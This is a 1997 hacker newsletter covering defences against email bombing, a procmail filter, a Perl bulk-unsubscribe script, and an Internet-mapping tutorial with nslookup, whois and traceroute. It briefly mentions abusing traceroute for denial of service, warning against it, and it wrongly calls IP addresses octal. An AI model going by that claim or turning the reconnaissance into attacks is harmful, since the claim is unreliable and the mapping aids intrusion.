|
|
Contents of Volume 3:How to protect yourself from email bombs!
How to map the Internet.
How to keep from getting kicked off IRC!
How to Read Email Headers and Find Internet Hosts
The Dread GTMHH on Cracking
How to Be a Hero in Computer Lab
________________________________________
GUIDE TO (mostly) HARMLESS HACKINGVol. 3 Number 1
How to protect yourself from email bombs!
________________________________________Email bombs! People like angry johnny, AKA the “Unamailer,” have made the news lately by arranging for 20 MB or more of email -- tens of thousands of messages -- to flood every day into his victims’ email accounts.
Email bombing can be bad news for two reasons. One, the victim can’t easily find any of their legitimate email in that giant garbage heap of spam. Two, the flood of messages ties up mail servers and chews up communications bandwidth.
Of course, those are the two main reasons that email bombers make their attacks: to mess up people’s email and/or harm the ISPs they target. The email bomb is a common weapon of war against Internet hosts controlled by spammers and con artists. It also is used by lusers with a grudge.
News stories make it sound like email bombing victims are, ahem, s*** out of luck. But we aren’t. We know, because angry -- the Christmas email bomber -- told the press that he had targeted the Happy Hacker list’s Supreme Commanderess, Carolyn Meinel. (Someone simultaneously attempted to email bomb the Happy Hacker list itself but no one has stepped forward to take credit for the attempt).
But as you know from the fact that we got the Happy Hacker Digest out after the attack, and by the fact that I kept answering my email, there are ways to beat the email bombers.
Now most of these are techniques for use by experts only. But if you are, like most of us on this list, a newbie, you may be able to win points with your ISP by emailing its technical help people with some of the information within this guide. Maybe then they’ll forgive you if your shell log file gets to looking a little too exciting!
My first line of defense is to use several on-line services. That way, whenever one account is getting hacked, bombed, etc., I can just email all my correspondents and tell them where to reach me. Now I’ve never gotten bombed into submission, but I have gotten hacked badly and often enough that I once had to dump an ISP in disgust. Or, an ISP may get a little too anxious over your hacking experiments. So it’s a good idea to be prepared to jump accounts.
But that’s a pretty chicken way to handle email bombing. Besides, a member of the Happy Hacker list says that the reason angry johnny didn’t email bomb all the accounts I most commonly use is because he persuaded johnny to just bomb one for publicity purposes. But even if johnny had bombed all my favorite accounts, I could have been back on my feet in a hurry.
There are several ways that either your ISP or you can defeat these attacks.
The simplest defense is for your ISP to block mail bombs at the router. This only works, however, if the attack is coming from one or a few hosts. It also only works if your ISP agrees to help you out. Your ISP may just chicken out instead and close your account.
***************************
Newbie note: routers are specialized computers that direct traffic. A host is a computer on the Internet.
***************************But what if the attack comes from many places on the Internet? That happened to me on Christmas day when angry johnny took credit for an email bombing attack that also hit a number of well-known US figures such as evangelist Billy Graham, President Bill Clinton and Speaker of the US House of Representatives Newt Gingrich. (I blush to find myself in such company.)
The way angry johnny worked this attack was to set up a program that would go to one computer that runs a program to handle email lists and automatically subscribe his targets to all lists handled by that computer. Then his program went to another computer that handles email lists and subscribed his targets to all the lists it handled, and so on.
I was able to fix my problem within a few minutes of discovery. johnny had subscribed all these lists to my address cmeinel@swcp.com. But I use my private domain, techbroker.com, to receive email. Then I pipe all this from my nameserver at Highway Technologies to whatever account I find useful at the time. So all I had to do was go to the Highway Technologies Web site and configure my mail server to pipe email to another account.
**************************
Newbie note: a mail server is a computer that handles email. It is the one to which you hook your personal computer when you give it a command to upload or download your email.
*************************************************
Evil genius tip: You can quickly reroute email by creating a file in your shell account (you do have a shell account, don’t you? SHELL ACCOUNT! All good hackers should have a SHELL ACCOUNT!) named .forward. This file directs your email to another email account of your choice.
***********************If angry johnny had email bombed cmeinel@techbroker.com, I would have piped all that crud to dev/null and requested that my correspondents email to carolyn@techbroker.com, etc. It’s a pretty flexible way of handling things. And my swcp.com accounts work the same way. That ISP, Southwest Cyberport, offers each user several accounts all for the same price, which is based on total usage. So I can create new email addresses as needed.
Warning -- this technique -- every technique we cover here -- will still cause you to lose some email. But I figure, why get obsessive over it? According to a study by a major paging company, a significant percentage of email simply disappears. No mail daemon warning that the message failed, nothing. It just goes into a black hole. So if you are counting on getting every piece of email that people send you, dream on.
But this doesn’t solve my ISP’s problem. They still have to deal with the bandwidth problem of all that crud flooding in. And it’s a lot of crud. One of the sysadmins at Southwest Cyberport told me that almost every day some luser email bombs one of their customers. In fact, it’s amazing that angry johnny got as much publicity as he did, considering how commonplace email bombing is. So essentially every ISP somehow has to handle the email bomb problem.
How was angry johnny was able to get as much publicity as he did? You can get an idea from this letter from Lewis Koch, the journalist who broke the story (printed with his permission):
From: Lewis Z Koch <lzkoch@mcs.net>
Subject: QuestionCarolyn:
First, and perhaps most important, when I called you to check if you had indeed been email bombed, you were courteous enough to respond with information. I think it is a tad presumptuous for you to state that "as a professional courtesy I am _letting_ Lewis Koch get the full scoop." This was a story that was, in fact, exclusive.
(Carolyn’s note: as a victim I knew technical details about the attack that Koch didn’t know. But since Koch tells me he was in contact with angry johnny in the weeks leading up to the mass email bombings of Christmas 1996, he clearly knew a great deal more than I about the list of johnny’s targets. I also am a journalist, but deferred to Koch by not trying to beat him to the scoop.)
Second, yes I am a subscriber and I am interested in the ideas you advance. But that interest does not extend to feeding you -- or single individual or group -- :"lots of juicy details." The details of any story lay in the
writing and commentary I offer the public. "Juicy" is another word for sensationalism, a tabloid approach -- and something I carefully avoid.(Carolyn’s note: If you wish to see what Koch wrote on angry johnny, you may see it in the Happy Hacker Digest of Dec. 28, 1996.)
The fact is I am extraordinarily surprised by some of the reactions I have received from individuals, some of whom were targets, others who are bystanders.
The whole point is that there are extraordinary vulnerabilities to and on the Net -- vulnerabilities which are being ignored...at the peril of us all.
Continuing: "However, bottom line is that the email bomber used a technique that is ridiculously lame -- so lame that even Carolyn Meinel could turn off the attack in mere minutes. Fry in dev/null, email bomber!"
johnny made the point several times that the attack was "simple." It was deliberately designed to be simple. I imagine -- I know -- that if he, or other hackers had chosen to do damage, serious, real damage, they could easily do so. They chose not to.
One person who was attacked and was angry with my report. He used language such as "his campaign of terror," "the twisted mind of 'johnny'," "psychos like 'johnny'," "some microencephalic moron," "a petty gangster" to describe johnny.
This kind of thinking ignores history and reality. If one wants to use a term such as "campaign of terror" they should check into the history of the Unabomber, or the group that bombed the Trade Center, or the Federal Building in Oklahoma City...or look to what has happened in Ireland or Israel. There one finds "terrorism."
What happened was an inconvenience --equivalent, in my estimation, to the same kind of inconvenience people experienced when young people blocked the streets of major cities in protest against the war in Vietnam. People were
inconvenienced --- but the protesters were making a point about an illegal and unnecessary war that even the prosecutors of the war, like Robert McNamara knew from the beginning was a lost venture. Hundreds of thousands
of people lost their lives in that war -- and if some people found themselves inconvenienced by people protesting against it -- I say, too d*** bad.Thank you for forwarding my remarks to your list
Ahem. I’m flattered, I guess. Is Koch suggesting the Happy Hacker list -- with its habit of ***ing out naughty words -- and evangelist Billy Graham -- whose faith I share -- are of an Earth-shaking level of political bad newsness comparable to the Vietnam War?
So let’s say you don’t feel that it is OK for any two-bit hacker wannabe to keep you from receiving email. what are some more ways to fight email bombs?
For bombings using email lists, one approach is to run a program that sorts through the initial flood of the email bomb for those “Welcome to the Tomato Twaddler List!” messages which tell how to unsubscribe. These programs then automatically compose unsubscribe messages and send them out.
Another way your ISP can help you is to provide a program called Procmail (which runs on the Unix operating system. For details, Zach Babayco (zachb@netcom.com) has provided the following article. Thank you, Zach!
*******************************
Defending Against Email-Bombing and Unwanted MailCopyright (C) Zach Babayco, 1996
[Before I start this article, I would like to thank Nancy McGough for letting me quote liberally from her Filtering Mail FAQ, available at http://www.cis.ohio-state.edu/hypertext/faq/usenet/mail/filtering-faq/faq.html. This is one of the best filtering-mail FAQs out there, and if you have any problems with my directions or want to learn more about filtering mail, this is where you should look.]
Lately, there are more and more people out there sending you email that you just don't want, like "Make Money Fast!" garbage or lame ezines that you never requested or wanted in the first place. Worse, there is the email bomb.
There are two types of email bombs, the Massmail and the Mailing List bomb:
1) Massmail-bombing. This is when an attacker sends you hundreds, or perhaps even thousands of pieces of email, usually by means of a script and fakemail. Of the two types, this is the easier to defend against, since the messages will be coming from just a few addresses at the most.
2) Mailing List bombs. In this case, the attacker will subscribe you to as many mailing lists as he or she can. This is much worse than a massmail because you will be getting email from many different mailing lists, and will have to save some of it so that you can figure out how to unsubscribe from each list.
This is where Procmail comes in. Procmail (pronounced prok-mail) is a email filtering program that can do some very neat things with your mail, like for example, if you subscribe to several high-volume mailing lists, it can be set up to sort the mail into different folders so that all the messages aren't all mixed up in your Inbox. Procmail can also be configured to delete email from certain people and addresses.
Setting up Procmail
-------------------First, you need to see if your system has Procmail installed. From the prompt, type:
> which procmail
If your system has Procmail installed, this command will tell you where Procmail is located. Write this down - you will need it later.
*NOTE* If your system gives you a response like "Unknown command: which" then try substituting 'which' with 'type', 'where', or 'whereis'.
If you still cannot find Procmail, then it is probably a good bet that your system does not have it installed. However, you're not completely out of luck - look at the FAQ I mentioned at the beginning of this file and see if your system has any of the programs that it talks about.
Next, you have to set up a resource file for Procmail. For the rest of this document, I will use the editor Pico. You may use whichever editor you feel comfortable with.
Make sure that you are in your home directory, and then start up your editor.
> cd
> pico .procmailrcEnter the following in the .procmailrc file:
# This line tells Procmail what to put in its log file. Set it to on when
# you are debugging.
VERBOSE=off# Replace 'mail' with your mail directory.
MAILDIR=$HOME/mail# This is where the logfile and rc files will be kept
PMDIR=$HOME/.procmailLOGFILE=$PMDIR/log
# INCLUDERC=$PMDIR/rc.ebomb
(yes, type the INCLUDERC line WITH the #)Now that you've typed this in, save it and go back up to your home directory.
> cd
> mkdir .procmailNow go into the directory that you just made, and start your editor up with
a new file: rc.ebomb:IMPORTANT: Be sure that you turn off your editor's word wrapping during this part. You will need to have the second, third, and fourth lines of this next example all on one line. With Pico, use the -w flag. Consult your editor's manual page for instructions on turning off its word wrapping. Make sure that when you edit it, you leave NO SPACES in that line.
> cd .procmail
> pico -w rc.noebomb# noebomb - email bomb blocker
:0
* ! ^((((Resent-)?(From|Sender)|X-Envelope-From):|From )(.*[^.%@a-z0-9])?
(Post(ma?(st(e?r)?|n)|office)|Mail(er)?|daemon|mmdf|root|uucp|LISTSERV|owner
|request|bounce|serv(ices?|er))([^.!:a-z0-9]|$)))
* ! ^From:.*(postmaster|Mailer|listproc|majordomo|listserv|cmeinel|johnb)
* ! ^TO(netstuff|computing|pcgames)
/dev/nullLets see what these do. The first line tells Procmail that this is the beginning of a "recipe" file. A recipe it basically what it sounds like -- it tells the program what it should look for in each email message, and if it finds what it is looking for, it performs an action on the message
- forwarding it to someone; putting it in a certain folder; or in this case, deleting it.The second, third, and fourth lines (the ones beginning with a *)are called CONDITIONS. The asterisk (*) tells Procmail that this is the beginning of a condition. The ! tells it to do the OPPOSITE of what it would normally do.
Condition 1:
* ! ^((((Resent-)?(From|Sender)|X-Envelope-From):|From )(.*[^.%@a-z0-9])?
(Post(ma?(st(e?r)?|n)|office)|Mail(er)?|daemon|mmdf|root|uucp|LISTSERV|owner
|request|bounce|serv(ices?|er))([^.!:a-z0-9]|$)))Don't freak out over this, it is simpler than it seems at first glance. This condition tells Procmail to look at the header of a message, and see if it is from one of the administrative addresses like root or postmaster, and also check to see if it is from a mailer-daemon (the thing that sends you mail when you bounce a message). If a message IS
from one of those addresses, the recipe will put the message into your inbox and not delete it.Advanced User Note: Those of you who are familiar with Procmail are probably wondering why I require the user to type in that whole long line of commands, instead of using the FROM_MAILER command. Well, it looked like a good idea at first, but I just found out a few days ago that FROM_MAILER also checks the Precedence: header for the words junk, bulk, and list. Many (if not all) mailing-list servers have either Precedence: bulk or Precedence: list, so if someone subscribes you to several hundred lists, FROM_MAILER would let most of the messages through, which is NOT what we want.
Condition 2:
* ! ^From:.*(listproc|majordomo|cmeinel|johnb)
This condition does some more checking of the From: line in the header. In this example, it checks for the words listproc, majordomo, cmeinel, and johnb. If it is from any of those people, it gets passed on to your Inbox. If not, it's a goner. This is where you would put the usernames
of people who normally email you, and also the usernames of mailing-list servers, such as listproc and majordomo. When editing this line, remember to: only put the username in the condition, not a persons full email address, and remember to put a | between each name.Condition 3:
* ! ^TO(netnews|crypto-stuff|pcgames)
This final condition is where you would put the usernames of the mailing lists that you are subscribed to (if any). For example, I am subscribed to the netnews, crypto-stuff, and pcgames lists. When you get a message from most mailing lists, most of the time the list address will be in the
To: or Cc: part of the header, rather than the From: part. This line will check for those usernames and pass them through to your Inbox if they match. Editing instructions are the same as the ones for Condition 2.The final line, /dev/null, is essentially the trash can of your system. If a piece of email does not match any of the conditions, (i.e. it isn't from a mail administrator, it isn't from a listserver or someone you write to, and it's not a message from one of your usual mailing lists) Procmail dumps the message into /dev/null, never to be seen again.
Ok. Now you should have created two files: .procmailrc and rc.noebomb. We need one more before everything will work properly. Save rc.noebomb and exit your editor, and go to your home directory. Once there, start your editor up with the no word wrapping command.
> cd
> pico -w .forwardWe now go to an excerpt from Nancy M.'s Mail Filtering FAQ:
Enter a modified version of the following in your ~/.forward:
"|IFS=' ' && exec /usr/local/bin/procmail -f- || exit 75 #nancym"
== IMPORTANT NOTES ==
* Make sure you include all the quotes, both double (") and single (').
* The vertical bar (|) is a pipe.
* Replace /usr/local/bin with the correct path for procmail (see step 1).
* Replace `nancym' with your userid. You need to put our userid in your .forward so that it will be different than anyother .forward ile on your system.
* Do NOT use ~ or environment variables, like $HOME, in your .forward file. If procmail resides below your home directory write out the *full* path.On many systems you need to make your .forward world
readable and your home directory world searchable in order for the mail transport agent to "see" it. To do this type:cd
chmod 644 .forward
chmod a+x .If the .forward template above doesn't work the following alternatives might be helpful:
In a perfect world:
"|exec /usr/local/bin/procmail #nancym"
In an almost perfect world:
"|exec /usr/local/bin/procmail USER=nancym"
In another world:
"|IFS=' ';exec /usr/local/bin/procmail #nancym"
In a different world:
"|IFS=' ';exec /usr/local/bin/procmail USER=nancym"
In a smrsh world:
"|/usr/local/bin/procmail #nancym"
Now that you have all the necessary files made, it's time to test this filter. Go into your mailreader and create a new folder called Ebombtest. This procedure differs from program to program, so you may have to experiment a little. Then open up the rc.noebomb file and change /dev/null to Ebombtest. (You should have already changed Conditions 2 and 3 to what you want; if not, go do it now!) Finally, open up .procmailrc and remove the # from the last line.
You will need to leave this on for a bit to test it. Ask some of the people in Condition 2 to send you some test messages. If the messages make it through to your Inbox, then that condition is working fine. Send yourself some fake email under a different name and check to see if it
ends up in the Ebombtest folder. Also, send yourself some fakemail from root@wherever.com to make sure that Condition 1 works. If you're on any mailing lists, those messages should be ending up in your Inbox as well.If all of these test out fine, then congratulations! You now have a working defense against email bombs. For the moment, change the Ebombtest line in the rc.noebomb file back to /dev/null, and put the # in front of the INCLUDERC line in the .procmailrc file. If someone ever decides to emailbomb you, you only need to remove the #, and you will have greatly cut down on the amount of messages coming into your Inbox, giving you a little bit of breathing room to start unsubscribing to all those lists, or start tracking down those idiots who did it and get their
asses kicked off their ISP's.If you have any comments or questions about this, email me at zachb@netcom.com. Emailbombs WILL go to /dev/null, so don't bother!
Disclaimer: When you activate this program, it is inevitable that a small amount of wanted mail MAY get put into /dev/null, due to the fact that it is nearly impossible to know the names of all the people that may write to you. Therefore, I assume no responsibility for any email which
may get lost, and any damages which may come from those lost messages.********************
Don’t have procmail? If you have a Unix box, you can download procmail from ftp://ftp.informatik.rwth-aachen.de/pub/packages/procmail/
*******************A note of thanks goes to Damien Sorder (jericho@dimensional.com) for his assistance in reviewing this guide.
And now, just to make certain you can get this invaluable Perl script to automatically unsubscribe email lists, here is the listing:
#!/usr/local/bin/perl# unsubscribe
#
# A perl script by Kim Holburn, University of Canberra 1996.
# kim@canberra.edu.au
# Feel free to use this and adjust it. If you make any useful adjustments or
# additions send them back to me.
#
# This script will unsubscribe users in bulk from whatever mail lists they are
# subscribed to. It also mails them that it has done this.
# It is useful for sys admins of large systems with many accounts and
# floating populations, like student servers.
# This script must be run by root although I don't check for this.
# You have to be root to read someone else's mailbox and to
# su to their account, both of which this script need to do.
#
# This script when applied to a mailbox will look through it to find
# any emails sent by mailing lists, attempt to determine the address of the
# mailing list and then send an unsubscribe message from that user.
# If invoked with no options only the mailbox name(s) it will assume
# the mailbox filename is the same as the username, as it is on a sun.
#
# Technical details:
# To find emails from mailing lists it looks for "owner" as part of
# the originating email address in the BSD From line (envelope).
# list servers that don't do this will be missed if you can figure a way
# round this let me know.
# The script doesn't do any file locking but then it only reads the mailbox
# file.sub fail_usage {
if (@_ ne '') { print "Error : ", @_, "\n"; }
print "Usage : $0 [-d] mailboxes\n";
print "Usage : $0 [-d] -u user mailbox\n";
print "Usage : $0 [-d] -u user -l listname -h host -a listserver\n";
print "where listserver is the full email address of the listserver\n";
exit;
}sub unsub {
local ($myuser, $mylist, $myhost, $myaddress) = @_;if (!$debug) {
if (!open (SEND,
"|(USER=$myuser;LOGNAME=$myuser;su $myuser -c \"/usr/ucb/mail $myaddress\")"))
{ print "Couldn't open mailer for user \"$myuser\"\n"; next; }
print SEND "unsubscribe $mylist\n" ;
close SEND;
} else {
print "No unsub \"$myuser\" on \"$mylist@$myhost\" to :\n";
print " $myaddress\n";
}
}sub notify {
local($myuser, $mylist, $myhost, $myaddress) = @_;
if (!$debug) {
if (!open (SEND, "|/usr/ucb/mail -s \"unsubscribed $mylist\" $myuser"))
{ print "Couldn't open mailer for user \"$myuser\"\n"; next; }
$mess = <<EOM;
You have been automatically unsubscribed from the mailing list :
$mylist@$myhost
to resubscribe follow the original directions or
EOM
print SEND $mess;
if ($myaddress !~ /,/) {
print SEND "send a message to the address $myaddress \n" ;
} else {
print SEND "send a message to the appropriate one of the addresses:\n";
print SEND "$myaddress \n" ;
}
$mess4 = <<EOM2;
with no subject, no signature and a single line :
subscribe (your name)EOM2
print SEND $mess4 ;
close SEND;
} else {
print "No notify \"$myuser\" on \"$mylist@$myhost\" to :\n";
print " $myaddress\n";
}
}$debug=0;
$usersupplied=0;
while (($#ARGV > (-1)) && ($ARGV[0] =~ /^-/)) {
if ($ARGV[0] eq '-d') { shift ARGV; $debug=1; }
elsif ($#ARGV < 1) { &fail_usage("option \"$ARGV[0]\" needs an argument"); }
elsif ($ARGV[0] eq '-u') { shift ARGV; $user=shift ARGV; }
elsif ($ARGV[0] eq '-l') { shift ARGV; $list=shift ARGV; }
elsif ($ARGV[0] eq '-h') { shift ARGV; $host=shift ARGV; }
elsif ($ARGV[0] eq '-a') { shift ARGV; $address=shift ARGV; }
else { &fail_usage(); }
}
$usersupplied = ($user ne '') ;#print "debug d=\"$debug\" u=\"$user\" l=\"$list\" h=\"$host\"\n";
#print "debug \$#ARGV=$#ARGV a=\"$address\" \n";
if ($#ARGV == (-1)) {
if ($usersupplied && $list ne '' && $host ne '' && $address ne '' && $#ARGV) {
$list =~ s/@.*$//;
$user =~ s/@.*$//;
$host =~ s/^.*@//;
if ($address !~ /@/) { &fail_usage("bad address"); }
&unsub ($user, $list, $host, $address);
¬ify ($user, $list, $host, $address);
exit;
} else { &fail_usage("no files and no addresses"); }
}if ($usersupplied && $#ARGV > 0) { &fail_usage(); }
foreach $file (@ARGV) {
%addresses=();
if (!$usersupplied) { $user=$file; }
$user =~ s@^.*/@@;
if ($file =~ /^\./) { print "skipping wrong type of file \"$file\"\n"; next; }
if ($file =~ /\.lock/)
{ print "skipping lock file \"$file\"\n"; next; }
if ($file =~ /\./) { print "skipping wrong type of file \"$file\"\n"; next; }
$user =~ s/^\.//;
$user =~ s/\..*$//;
if (!open (MYFILE, "<$file" ))
{ print "Couldn't open file \"$file\"\n"; next; }
print "--------------------------opening file \"$file\"\n";
while (<MYFILE>) {
# if (/(\bnews-[-\w.]+@)|([-\w.]+-news@)/i)
# if (/(\brequest-[-\w.]+@)|([-\w.]+-request@)/i)
if (/(\bowner-[-\w.]+@)|([-\w.]+-owner@)/i) {
chop;
tr/A-Z/a-z/;
if (/\bowner-[-\w.]+@/) { s/^.*\bowner-([-\w.]+@[\w.]+)\b.*$/\1/; }
else { s/(^|^.*[^-\w.])([-\w.]+)-owner(@[\w.]+)\b.*$/\2\3/; }
if (/[^a-z0-9@.-]/) { next; }
if (!defined ($addresses{$_})) { $addresses{$_}=""; }
}
if (/(\bl-[-\w.]+@)|([-\w.]+-l@)/i) {
chop;
tr/A-Z/a-z/;
if (/\bl-[-\w.]+@/) { s/^.*\bl-([-\w.]+@[\w.]+)\b.*$/\1/; }
else { s/(^|^.*[^-\w.])([-\w.]+)-l(@[\w.]+)\b.*$/\2\3/; }
if (/[^a-z0-9@.-]/) { next; }
if (!defined ($addresses{$_})) { $addresses{$_}=""; }
}
}
close MYFILE;
while (($key,$value)=each %addresses) { print "$key\n"; }
if (! keys %addresses ) { print "no listservers\n"; next; }
if (! open (MYFILE, "<$file" ))
{ print "Couldn't open file \"$file\"\n"; next; }
print "looking for listserver addresses\n";
while (<MYFILE>) {
foreach $address (keys %addresses) {
$host=$address;
$host =~ s/^.*@//;
if (/(listserv|listproc|majordomo)@$host/i) {
$addresses{$address}=$1;
# print "found 1 = \"$1\"\n";
}
}
}
close MYFILE;
while (($key,$value)=each %addresses) {
$host=$key;
$host=~s/^.*@//;
$list=$key;
$list=~s/@.*$//;
# print "$value@$host key=\"$key\" list=\"$list\" \n";
if ($value eq '')
{ $address="listserv@$host,listproc@$host,majordomo@$host"; }
else { $address="$value@$host"; }
print "address=\"$address\"\n";
print "unsubscribe $list\n";if (!$debug) {
print "Mailing $user\n";
&unsub ($user, $list, $host, $address);
¬ify ($user, $list, $host, $address);
} else {
print "debug no mail\n";
}
}
}
________________________________________
Subscribe to our email list by emailing to hacker@techbroker.com with message "subscribe" or join our Hacker forum at http://www.infowar.com/cgi-shl/login.exe.
Want to share some kewl stuph with the Happy Hacker list? Correct mistakes? Send your messages to hacker@techbroker.com. To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com and be sure to state in your message that you want me to keep this confidential. If you wish your message posted anonymously, please say so! Please direct flames to dev/null@techbroker.com. Happy hacking!
Copyright 1997 Carolyn P. Meinel. You may forward or post on your Web site this GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end..
________________________________________
____________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 3 Number 2
How to map the Internet. Dig! Whois! Nslookup! Traceroute! Netstat port is getting hard to use anymore, however...
____________________________________________________________Why map the Internet?
* Because it’s fun -- like exploring unknown continents. The Internet is so huge, and it changes so fast, no one has a complete map.
* Because when you can’t make contact with someone in a distant place, you can help your ISP trouble shoot broken links in the Internet. Yes, I did that once that when email failed to a friend in Northern Ireland. How will your ISP know that their communications provider is lying down on the job unless someone advises them of trouble?
* Because if you want to be a computer criminal, your map of the connections to your intended victim gives you valuable information.
Now since this is a lesson on *legal* hacking, we’re not going to help you out with how to determine the best box in which to install a sniffer or how to tell what IP address to spoof to get past a packet filter. We’re just going to explore some of the best tools available for mapping the uncharted realms of the Internet.
For this lesson, you can get some benefit even if all you have is Windows. But to take full advantage of this lesson, you should either have some sort of Unix on your personal computer, or a shell account! SHELL ACCOUNT! If you don’t have one, you may find an ISP that will give you a shell account at http://www.celestin.com/pocia/.
****************************
Newbie note: A shell account is an account with your ISP that allows you to give commands on a computer running Unix. The “shell” is the program that translates your keystrokes into Unix commands. Trust me, if you are a beginner, you will find bash (for Bourne again shell) to be easiest to use. Ask tech support at your ISP for a shell account set up to use bash. Or, you may be able to get the bash shell by simply typing the word “bash” at the prompt. If your ISP doesn’t offer shell accounts, get a new ISP that does offer it. A great book on using the bash shell is _Learning the Bash Shell_, by Cameron Newham and Bill Rosenblatt, published by O’Reilly.
****************************So for our mapping expedition, let’s start by visiting the Internet in Botswana! Wow, is Botswana even on the Internet? It’s a lovely landlocked nation in the southern region of Africa, famous for cattle ranching, diamonds and abundant wildlife. The language of commerce in Botswana is English, so there’s a good chance that we could understand messages from their computers.
Our first step in learning about Botswana’s Internet hosts is to use the Unix program nslookup.
****************************
Evil genius tip: Nslookup is one of the most powerful Internet mapping tools in existence. We can hardly do it justice here. If you want to learn how to explore to the max, get the book _DNS and BIND_ by Paul Albitz and Cricket Liu, published by O’Reilly, 1997 edition.
***************************The first step may be to find where your ISP has hidden the program by using the command “whereis nslookup.” (Or your computer may use the “find” command.) Aha -- there it is! I give the command:
->/usr/etc/nslookup
Default Server: swcp.com
Address: 198.59.115.2
>These two lines and the slightly different prompt (it isn’t an arrow any more) tell me that my local ISP is running this program for me. (It is possible to run nslookup on another computer from yours.) Now we are in the program, so I have to remember that my bash commands don’t work any more. Our next step is to tell the program that we would like to know what computers handle any given domain name.
> set type=ns
Next we need to know the domain name for Botswana. To do that I look up the list of top level domain names on page 379 of the 1997 edition of _DNS and BIND_. For Botswana it’s bw. So I enter it at the prompt, remembering -- this is VERY important -- to put a period after the domain name:
> bw.
Server: swcp.com
Address: 198.59.115.2Non-authoritative answer:
This “non-authoritative answer” stuff tells me that this information has been stored for awhile, so it is possible, but unlikely, that the information below has changed.
bw nameserver = DAISY.EE.UND.AC.ZA
bw nameserver = RAIN.PSG.COM
bw nameserver = NS.UU.NET
bw nameserver = HIPPO.RU.AC.ZA
Authoritative answers can be found from:
DAISY.EE.UND.AC.ZA inet address = 146.230.192.18
RAIN.PSG.COM inet address = 147.28.0.34
NS.UU.NET inet address = 137.39.1.3
HIPPO.RU.AC.ZA inet address = 146.231.128.1I look up the domain name “za” and discover it stands for South Africa. This tells me that the Internet is in its infancy in Botswana -- no nameservers there -- but must be well along in South Africa. Look at all those nameservers!
***********************
Newbie note: a nameserver is a computer program that stores data on the Domain Name System. The Domain Name System makes sure that no two computers have the same name. It also stores information on how to find other computers. When various nameservers get to talking with each other, they eventually, usually within seconds, can figure out the routes to any one of the millions of computers on the Internet.
***********************Well, what this tells me is that people who want to set up Internet host computers in Botswana usually rely on computers in South Africa to connect them. Let’s learn more about South Africa. Since we are still in the nslookup program, I command it to tell me what computers are nameservers for South Africa:
> za.
Server: swcp.com
Address: 198.59.115.2Non-authoritative answer:
za nameserver = DAISY.EE.UND.AC.za
za nameserver = UCTHPX.UCT.AC.za
za nameserver = HIPPO.RU.AC.za
za nameserver = RAIN.PSG.COM
za nameserver = MUNNARI.OZ.AU
za nameserver = NS.EU.NET
za nameserver = NS.UU.NET
za nameserver = UUCP-GW-1.PA.DEC.COM
za nameserver = APIES.FRD.AC.za
Authoritative answers can be found from:
DAISY.EE.UND.AC.za inet address = 146.230.192.18
UCTHPX.UCT.AC.za inet address = 137.158.128.1
HIPPO.RU.AC.za inet address = 146.231.128.1
RAIN.PSG.COM inet address = 147.28.0.34
MUNNARI.OZ.AU inet address = 128.250.22.2
MUNNARI.OZ.AU inet address = 128.250.1.21
NS.EU.NET inet address = 192.16.202.11
UUCP-GW-1.PA.DEC.COM inet address = 204.123.2.18
UUCP-GW-1.PA.DEC.COM inet address = 16.1.0.18
APIES.FRD.AC.za inet address = 137.214.80.1***********************
Newbie note: What is inet address = 137.214.80.1 supposed to mean? That’s the name of a computer on the Internet (inet) -- in this case APIES.FRD.AC -- in octal. Octal is like regular numbers except in base 8 rather than base 10. All computer names on the Internet must be changed into numbers so that other computers can understand them.
**********************Aha! Some of those nameservers are located outside South Africa. We see computers in Australia (au) and the US (com domain). Next, we exit the nslookup program with the command ^D. That’s made by holding down the control key while hitting the small “d” key. It is VERY IMPORTANT to exit nslookup this way and not with ^C.
Next, we take one of the nameservers in South Africa and ask:
->whois HIPPO.RU.AC.ZA
[No name] (HIPPO)Hostname: HIPPO.RU.AC.ZA
Address: 146.231.128.1
System: SUN running SUNOSDomain Server
Record last updated on 24-Feb-92.
To see this host record with registered users, repeat the command with a star ('*') before the name; or, use '%' to show JUST the registered users.
The InterNIC Registration Services Host contains ONLY Internet Information (Networks, ASN's, Domains, and POC's).
Please use the whois server at nic.ddn.mil for MILNET Information.Kewl! This tells us what kind of computer it is -- a Sun -- and the operating system, Sun OS.
Now, just for variety, I use the whois command with the numerical address of one of the nameservers. This doesn’t always give back the text name, but sometimes it works. And, voila, we get:
->whois 146.230.192.18
[No name] (DAISY1)Hostname: DAISY.EE.UND.AC.ZA
Address: 146.230.192.18
System: HP-9000 running HP-UXDomain Server
Record last updated on 14-Sep-94.
Ah, but all this is doing so far is just telling us info about who is a nameserver for whom. Now how about directly mapping a route from my computer to South Africa? For that we will use the traceroute command.
************************
Netiquette tip: The traceroute program is intended for use in network testing, measurement and management. It should be used primarily for manual fault isolation, like the time I couldn’t email my friend in Northern Ireland. Because of the load it could impose on the network, it is unwise to use traceroute from automated scripts which could cause that program to send out huge numbers of queries. Use it too much and your ISP may start asking you some sharp questions.
************************************************
YOU COULD GO TO JAIL WARNING: If you just got an idea of how to use traceroute for a denial of service attack, don’t call your favorite journalist and tell him or her that you are plotting a denial of service attack against the ISPs that serve famous people like Bill Clinton and Carolyn Meinel!:-) Don’t write that script. Don’t use it. If you do, I’ll give another interview to PC World magazine (http://www.pcworld.com/news/newsradio/meinel/index.html) about how a three-year-old could run the attack. And if you get caught we’ll all laugh at you as you get hustled off in chains while your journalist friend gets a $250K advance on his or her book deal about you.
************************I give the command:
->whereis traceroute
traceroute: /usr/local/bin/tracerouteOK, now we’re ready to map in earnest. I give the command:
->/usr/local/bin/traceroute DAISY.EE.UND.AC.ZA
And the answer is:
traceroute to DAISY.EE.UND.AC.ZA (146.230.192.18), 30 hops max, 40 byte packets
1 sisko (198.59.115.1) 3 ms 4 ms 4 ms
2 glory-cyberport.nm.westnet.net (204.134.78.33) 47 ms 8 ms 4 ms
3 ENSS365.NM.ORG (129.121.1.3) 5 ms 10 ms 7 ms
4 h4-0.cnss116.Albuquerque.t3.ans.net (192.103.74.45) 17 ms 41 ms 28 ms
5 f2.t112-0.Albuquerque.t3.ans.net (140.222.112.221) 7 ms 6 ms 5 ms
6 h14.t16-0.Los-Angeles.t3.ans.net (140.223.17.9) 31 ms 39 ms 84 ms
7 h14.t8-0.San-Francisco.t3.ans.net (140.223.9.13) 67 ms 43 ms 68 ms
8 enss220.t3.ans.net (140.223.9.22) 73 ms 58 ms 54 ms
9 sl-mae-w-F0/0.sprintlink.net (198.32.136.11) 97 ms 319 ms 110 ms
